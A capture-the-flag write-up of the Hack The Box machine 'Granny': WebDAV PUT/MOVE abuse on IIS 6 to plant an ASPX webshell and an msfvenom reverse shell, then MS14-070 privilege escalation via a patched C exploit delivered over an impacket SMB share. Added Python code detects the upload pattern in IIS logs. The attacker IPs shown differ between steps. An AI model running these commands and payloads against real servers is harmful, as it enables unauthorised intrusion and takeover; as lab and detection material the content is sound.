Granny
Target IP: 10.129.95.234
Attacker IP: 10.10.14.31
1. Information gathering
nmap
Result: only port 80 came up.
$ nmap -sV -sC --open -Pn -n --max-retries 2 --min-rate 6000 -oA svsc 10.129.95.234
>
Nmap scan report for 10.129.95.234
Host is up (0.12s latency).
Not shown: 999 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-webdav-scan:
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Date: Wed, 23 Aug 2023 16:37:39 GMT
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| http-methods:
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Browsing to it directly shows a strange page.
gobuster
// next time, try the command below
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u host -t 50 -x aspx,txt,html
$ gobuster dir -u http://10.129.95.234/ -w /usr/share/dirb/wordlists/common.txt -o gobuseter
>
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.95.234/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/21 12:52:47 Starting gobuster in directory enumeration mode
===============================================================
/_private (Status: 301) [Size: 155] [--> http://10.129.95.234/%5Fprivate/]
/_vti_bin/_vti_adm/admin.dll (Status: 200) [Size: 195]
/_vti_bin (Status: 301) [Size: 157] [--> http://10.129.95.234/%5Fvti%5Fbin/]
/_vti_bin/shtml.dll (Status: 401) [Size: 579]
/_vti_bin/_vti_aut/author.dll (Status: 200) [Size: 195]
/aspnet_client (Status: 301) [Size: 160] [--> http://10.129.95.234/aspnet%5Fclient/]
/Images (Status: 301) [Size: 151] [--> http://10.129.95.234/Images/]
/images (Status: 301) [Size: 151] [--> http://10.129.95.234/images/]
Progress: 4614 / 4615 (99.98%)
2. Exploit
FrontPage Exploit
_vti_bin is a FrontPage-related path, so I ran searchsploit frontpage.
Since admin.dll and author.dll returned 200, it seemed worth checking for related vulnerabilities, but none showed up.
Accessing the discovered paths shows that a directory listing weakness is present.
I tried several things through it (e.g. FrontPage .pwd File Credential Dump), but nothing came of it.
Googling did not help much either.
WebDAV Exploit
WebDAV showed up in the nmap result.
// WebDAV (Web Distributed Authoring and Versioning) is an HTTP extension designed to let people create and modify websites over HTTP.
Methods such as PUT and MOVE were also listed, so it was worth checking whether files could be uploaded.
I used the davtest tool to check which file types could be uploaded and whether a directory could be created.
$ davtest -url http://10.129.95.234
>
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.129.95.234
********************************************************
NOTE Random string for this session: gH6iEkdRHMLGake
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake
********************************************************
Sending test files
PUT aspx FAIL
PUT php SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.php
PUT html SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.html
PUT txt SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.txt
PUT jsp SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.jsp
PUT pl SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.pl
PUT jhtml SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.jhtml
PUT cfm SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.cfm
PUT cgi FAIL
PUT asp FAIL
PUT shtml FAIL
********************************************************
Checking for test file execution
EXEC php FAIL
EXEC html SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.html
EXEC html FAIL
EXEC txt SUCCEED: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.txt
EXEC txt FAIL
EXEC jsp FAIL
EXEC pl FAIL
EXEC jhtml FAIL
EXEC cfm FAIL
********************************************************
/usr/bin/davtest Summary:
Created: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.php
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.html
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.txt
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.jsp
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.pl
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.jhtml
PUT File: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.cfm
Executes: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.html
Executes: http://10.129.95.234/DavTestDir_gH6iEkdRHMLGake/davtest_gH6iEkdRHMLGake.txt
The site runs ASP.NET, but the aspx PUT FAILs.
I tried uploading directly with curl. // fails
$ echo 0xdf > test.txt
$ curl -X PUT http://10.129.95.234/df.txt -d @test.txt
$ curl http://10.129.95.234/df.txt
0xdf
$ curl -X PUT http://10.129.95.234/df.aspx -d @test.txt
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be displayed</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be displayed</h1>
You have attempted to execute a CGI, ISAPI, or other executable program from a directory that does not allow programs to be executed.
<hr>
<p>Please try the following:</p>
<ul>
<li>Contact the Web site administrator if you believe this directory should allow execute access.</li>
</ul>
<h2>HTTP Error 403.1 - Forbidden: Execute access is denied.<br>Internet Information Services (IIS)</h2>
Then I learned that a Unix-based WebDAV client CLI tool called cadaver exists, and tried it.
Link: https://linux.die.net/man/1/cadaver
Its usage includes move, so I used the tool to rename the txt to aspx with move. // it works.
$ cadaver http://10.129.95.234
dav:/> ls
>
Listing collection `/': succeeded.
Coll: DavTestDir_gH6iEkdRHMLGake 0 Aug 24 2023
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
df.txt 4 Aug 24 2023
iisstart.htm 1433 Feb 22 2003
pagerror.gif 2806 Feb 22 2003
postinfo.html 2440 Apr 12 2017
dav:/> move df.txt df.aspx
>
Moving `/df.txt' to `/df.aspx': succeeded.
dav:/> ls
>
Listing collection `/': succeeded.
Coll: DavTestDir_gH6iEkdRHMLGake 0 Aug 24 2023
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
df.aspx 4 Aug 24 2023
iisstart.htm 1433 Feb 22 2003
pagerror.gif 2806 Feb 22 2003
postinfo.html 2440 Apr 12 2017
Upload an .aspx-based webshell as a .txt file, then rename it from txt to aspx with the cadaver tool.
$ cp /usr/share/webshells/aspx/cmdasp.aspx ./granny/cmdasp.txt
$ curl -X PUT http://10.129.95.234/cmdasp.txt -d @cmdasp.txt
$ cadaver http://10.129.95.234/
>
dav:/> move cmdasp.txt cmdasp.aspx
Moving `/cmdasp.txt' to `/cmdasp.aspx': succeeded.
dav:/> ls
Listing collection `/': succeeded.
Coll: DavTestDir_gH6iEkdRHMLGake 0 Aug 24 2023
Coll: _private 0 Apr 12 2017
Coll: _vti_bin 0 Apr 12 2017
Coll: _vti_cnf 0 Apr 12 2017
Coll: _vti_script 0 Apr 12 2017
Coll: aspnet_client 0 Apr 12 2017
Coll: images 0 Apr 12 2017
_vti_inf.html 1754 Apr 12 2017
cmdasp.aspx 1358 Aug 24 2023
df.aspx 4 Aug 24 2023
iisstart.htm 1433 Feb 22 2003
pagerror.gif 2806 Feb 22 2003
postinfo.html 2440 Apr 12 2017
dav:/>
Browsing to that path in the browser confirms that the webshell runs.
MOVE can of course also be done with curl.
Let's upload a REVERSE SHELL.
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.35 LPORT=4444 -f aspx -o shell.aspx
>
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2740 bytes
Saved as: shell.aspx
$ mv shell.aspx shell.txt
$ curl -X PUT http://10.129.95.234/shell.txt --data-binary @shell.txt
$ curl -X MOVE --header 'Destination:http://10.129.95.234/shell.aspx' 'http://10.129.95.234/shell.txt'
$ curl http://10.129.95.234/shell.aspx
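From the defender's side, the sequence above (a PUT of a harmless extension, a MOVE of the same path, then a request for the renamed script) is visible in the IIS logs even though the Destination header of MOVE is not among the logged fields. The following Python is an added example, not code from this write-up or from any tool named in it; it assumes the default IIS 6 W3C extended log fields and uses a constructed log sample modelled on the requests above.

```python
"""Detect the WebDAV "PUT a harmless extension, then MOVE/COPY it to a script
extension" pattern in IIS W3C extended logs.

Added example for this write-up; not code from the original post or from any
tool named in it. Assumptions: the server logs in the default IIS 6 W3C format
shown in the constructed sample below, and the Destination header of MOVE/COPY
is not logged, so the rename target is inferred from a later request for the
same base name with a script extension.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import posixpath

# extensions IIS 6 hands to the ASP / ASP.NET script handlers
SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx", ".asa", ".cer", ".cdx"}

# Constructed sample log modelled on the PUT -> MOVE -> GET sequence above.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2023-08-24 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2023-08-24 10:00:01 10.129.95.234 GET /iisstart.htm - 80 - 10.10.14.31 curl/7.88.1 200 0 0
2023-08-24 10:00:05 10.129.95.234 PUT /cmdasp.txt - 80 - 10.10.14.31 curl/7.88.1 201 0 0
2023-08-24 10:00:09 10.129.95.234 MOVE /cmdasp.txt - 80 - 10.10.14.31 cadaver/0.23.3 201 0 0
2023-08-24 10:00:15 10.129.95.234 GET /cmdasp.aspx - 80 - 10.10.14.31 Mozilla/5.0 200 0 0
2023-08-24 10:02:00 10.129.95.234 PUT /notes.txt - 80 - 10.10.14.40 curl/7.88.1 201 0 0
2023-08-24 10:05:00 10.129.95.234 PUT /df.aspx - 80 - 10.10.14.31 curl/7.88.1 403 1 0
"""


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields line."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # truncated or foreign line: skip instead of crashing the parser
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        rec["sc-status"] = int(rec["sc-status"])
        records.append(rec)
    return records


def _ok(rec):
    return 200 <= rec["sc-status"] < 300


def find_extension_swaps(records, window=timedelta(minutes=10)):
    """Alert on a successful PUT followed (same client, same path, within window)
    by a successful MOVE or COPY. 'executed' is True when the same client later
    requests the same base name with a script extension."""
    by_client = defaultdict(list)
    for r in records:
        by_client[r["c-ip"]].append(r)
    alerts = []
    for client, reqs in by_client.items():
        reqs.sort(key=lambda r: r["ts"])
        for i, put in enumerate(reqs):
            if put["cs-method"] != "PUT" or not _ok(put):
                continue
            base, _ = posixpath.splitext(put["cs-uri-stem"])
            for mv in reqs[i + 1:]:
                if mv["ts"] - put["ts"] > window:
                    break
                if mv["cs-method"] in ("MOVE", "COPY") and _ok(mv) and mv["cs-uri-stem"] == put["cs-uri-stem"]:
                    executed = any(
                        r["ts"] >= mv["ts"]
                        and posixpath.splitext(r["cs-uri-stem"])[0] == base
                        and posixpath.splitext(r["cs-uri-stem"])[1].lower() in SCRIPT_EXTS
                        for r in reqs
                    )
                    alerts.append({"client": client, "path": put["cs-uri-stem"],
                                   "put_at": put["ts"], "move_at": mv["ts"], "executed": executed})
                    break
    return alerts


def blocked_script_uploads(records):
    """Direct PUTs of a script extension that IIS refused (the 403.1 seen above):
    lower severity, but they show who is probing for upload."""
    return [r for r in records
            if r["cs-method"] == "PUT" and r["sc-status"] == 403
            and posixpath.splitext(r["cs-uri-stem"])[1].lower() in SCRIPT_EXTS]


if __name__ == "__main__":
    recs = parse_w3c(SAMPLE_LOG)
    for a in find_extension_swaps(recs):
        print(f"[!] {a['client']} PUT {a['path']} at {a['put_at']:%H:%M:%S}, "
              f"renamed at {a['move_at']:%H:%M:%S}, executed={a['executed']}")
    for r in blocked_script_uploads(recs):
        print(f"[i] {r['c-ip']} blocked PUT of {r['cs-uri-stem']} (403.{r['sc-substatus']})")
```

Run it as a script, or pass the contents of a real log file to parse_w3c(). Because the Destination header is not part of the standard fields, the rename target is only inferred from the follow-up request; logging that header (for example from a front-end proxy) makes the check exact. The fix on the server side is to stop anonymous clients from using the write methods (PUT, MOVE, COPY, MKCOL) and to keep writable directories out of the script handler mappings.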
Privilege Escalation
As shown below, privilege escalation is needed.
Use Windows Exploit Suggester to identify missing patches on the Windows target that could potentially allow privilege escalation.
// Copy systeminfo from the connected reverse shell.
// 356 results came back.... ;ㅅ;
$ git clone https://github.com/Pwnistry/Windows-Exploit-Suggester-python3
$ ./windows-exploit-suggester.py --update
$ pip install xlrd --upgrade
$ ./windows-exploit-suggester.py --database 2023-08-21-mssb.xlsx --systeminfo sysinfo.txt
[*] initiating winsploit version 3.4...
[*] database file detected as xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*]   https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]   http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*]   http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*]   http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*]   http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*]   http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]   http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]   http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
...
Filter to privilege escalation only.
$ ./windows-exploit-suggester.py --database 2023-08-21-mssb.xlsx --systeminfo sysinfo.txt | grep -E "Elevation|Escalation"
>
MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
MS14-070 matches the OS, so it feels like it should work. Going with this one.
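The grep above flattens the suggester output and loses which PoC line belongs to which bulletin. The following Python is an added example (not from the write-up and not part of Windows Exploit Suggester) that parses the tool's bulletin and PoC lines into one record per bulletin, keeps only the privilege-escalation entries, and orders them so that bulletins whose public PoC names the target OS come first, which is the reasoning used to pick MS14-070 above; read the other way round, the same ordering is the patch-priority list for whoever administers the host. The input is a constructed sample made of lines from the output above.

```python
"""Group Windows Exploit Suggester output by bulletin and rank the privilege-
escalation entries by how well their public PoC matches the target OS.

Added example; not part of the write-up or of Windows Exploit Suggester itself.
It assumes the tool's '[E]/[M] MSyy-nnn: title (KB) - Severity' lines followed by
'[*]   <url> -- <description>, <PoC|MSF>' lines, as in the output above.
"""
import re

# Constructed sample: a subset of the bulletin/PoC lines shown above.
SAMPLE = """\
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*]   https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*]   https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*]   http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*]   http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*]   http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*]   http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
"""

# "[M] MS15-051: <title> (<KB>) - <Severity>"
BULLETIN_RE = re.compile(r"^\[([EM])\] (MS\d{2}-\d{3}): (.+?) \((\d+)\) - (\w+)\s*$")
# "[*]   <url> -- <description>, <PoC|MSF>"; the github form uses ", " after the URL
# and some lines carry no trailing kind, so both parts are optional.
POC_RE = re.compile(r"^\[\*\]\s+(https?://\S+?),?\s+(?:--\s+)?(.*?)(?:,\s+(PoC|MSF))?\s*$")
EOP_RE = re.compile(r"elevation of privilege|privilege escalation", re.IGNORECASE)


def parse_suggester(text):
    """Turn the flat output into one record per bulletin with its PoC list attached."""
    entries, current = [], None
    for line in text.splitlines():
        m = BULLETIN_RE.match(line)
        if m:
            src, bid, title, kb, sev = m.groups()
            current = {"source": src, "bulletin": bid, "title": title,
                       "kb": kb, "severity": sev, "pocs": []}
            entries.append(current)
            continue
        m = POC_RE.match(line)
        if m and current is not None:
            url, desc, kind = m.groups()
            current["pocs"].append({"url": url, "desc": desc, "kind": kind})
    return entries


def rank_privesc(entries, os_hint):
    """Keep only privilege-escalation bulletins and order them: PoC naming the
    target OS first, then by severity, then newest bulletin first."""
    sev_rank = {"Critical": 0, "Important": 1, "Moderate": 2, "Low": 3}
    kept = []
    for e in entries:
        is_eop = EOP_RE.search(e["title"]) or any(EOP_RE.search(p["desc"]) for p in e["pocs"])
        if not is_eop:
            continue
        os_match = any(os_hint.lower() in p["desc"].lower() for p in e["pocs"])
        kept.append(dict(e, os_match=os_match))

    def key(e):
        yy, nnn = e["bulletin"][2:].split("-")
        return (not e["os_match"], sev_rank.get(e["severity"], 9), -int(yy), -int(nnn))

    kept.sort(key=key)
    return kept


if __name__ == "__main__":
    for e in rank_privesc(parse_suggester(SAMPLE), "Server 2003"):
        flag = "OS match" if e["os_match"] else "        "
        print(f"{flag} [{e['source']}] {e['bulletin']} {e['severity']:<9} KB{e['kb']}  {e['title']}")
        for p in e["pocs"]:
            print(f"             {p['kind'] or '-':<4} {p['url']}  {p['desc']}")
```

Bulletins without any PoC line (MS14-002 in the sample) are still listed: the suggester reports a missing patch there, so it stays on the patch list even though the database holds no public exploit for it.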
ms14-070
$ searchsploit ms14-070
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070) | windows/local/35936.py
Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) | windows/local/37755.c
------------------------------------------------------------------------------------------------------------------ ---------------------------------
searchsploit showed a C and a Python exploit file, but instead I downloaded the 37755.exe file from the address below.
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-070/MS14-070
Since the target's website has an upload vulnerability, I intended to download and run the exploit file through PowerShell,
but the target did not have PowerShell..
So I decided to copy the exe over an SMB share from KALI and run it.
$ sudo /usr/share/doc/python3-impacket/examples/smbserver.py share .
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
$ copy \\10.10.14.11\share\37755.exe C:\WINDOWS\Temp\37755.exe
But the joy was short-lived.. it hangs..
Haha..hahaha, back to 37755.c then. Hehe..
Let's compile..
$ i686-w64-mingw32-gcc-win32 37755.c -o exploit.exe -lws2_32
>
37755.c:78:15: error: conflicting types for ‘NTSTATUS’; have ‘DWORD’ {aka ‘long unsigned int’}
   78 | typedef DWORD NTSTATUS;
      |               ^~~~~~~~
In file included from /usr/share/mingw-w64/include/wincrypt.h:846,
                 from /usr/share/mingw-w64/include/windows.h:95,
                 from 37755.c:57:
/usr/share/mingw-w64/include/bcrypt.h:27:16: note: previous declaration of ‘NTSTATUS’ with type ‘NTSTATUS’ {aka ‘long int’}
   27 | typedef LONG NTSTATUS,*PNTSTATUS;
      |              ^~~~~~~~
So much fun; of course it was never going to work on the first try!
Change typedef DWORD NTSTATUS; to the following (mingw-w64's bcrypt.h, pulled in through windows.h, already declares NTSTATUS as LONG, so the typedef has to agree with it):
typedef _Return_type_success_(return >= 0) LONG NTSTATUS;
Recompiling now produces the binary without errors.
Send exploit.exe to the target over SMB again.
Run exploit.exe.
But another error.. it hangs and nothing happens.
Searching the internet, I found the following angel.
https://forum.hackthebox.com/t/granny-privesc-ms14-070-without-meterpreter/404/4
The angel said to change part of the exploit code as follows.
BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
    ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
    startupInformation->cb = sizeof (STARTUPINFO);
    /* attach the new console to the interactive desktop */
    startupInformation->lpDesktop = "WinSta0\\Default";
    ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));
    /* resolve cmd.exe from %COMSPEC% instead of a hard-coded path */
    LPTSTR lpComspec = (LPTSTR) malloc (1024 * sizeof (TCHAR));
    if (lpComspec == NULL)
        return FALSE;
    if (GetEnvironmentVariable ("comspec", lpComspec, 1024) == 0) {
        free (lpComspec);
        return FALSE;
    }
    BOOL ok = CreateProcess (
        lpComspec,
        NULL,
        NULL,
        NULL,
        TRUE,               /* inherit handles */
        0,
        NULL,
        NULL,
        &startupInformation[0],
        &processInformation[0]
    );
    free (lpComspec);
    return ok;
}
After the change, compile again, send the compiled file over the SMB share, and run it.
$ i686-w64-mingw32-gcc-win32 37755.c -o exploit1.exe -lws2_32
$ sudo /usr/share/doc/python3-impacket/examples/smbserver.py share .
$ rlwrap nc -lvnp 4444
$ copy \\10.10.14.11\share\exploit1.exe C:\WINDOWS\Temp\exploit1.exe
$ exploit1.exe
Victory for humanity
FLAG
Summary:
Using the PUT and MOVE methods to change the file extension, a reverse shell could be executed.
LOCAL privilege escalation was done with an exploit for an OS-version vulnerability (Windows Server 2003 SP2, MS14-070).
The target had no PowerShell, so the exploit file was delivered over an SMB share (KALI).
The prebuilt exploit exe found on the internet hung and could not be used (and came with no usage notes);
the C version produced an error and needed a code change, and hung again when run, so two rounds of code changes were needed.
Compile command: i686-w64-mingw32-gcc-win32 37755.c -o exploit1.exe -lws2_32
Open SMB share: sudo /usr/share/doc/python3-impacket/examples/smbserver.py share .
Try a different gobuster wordlist: gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u host -t 50 -x aspx,txt,html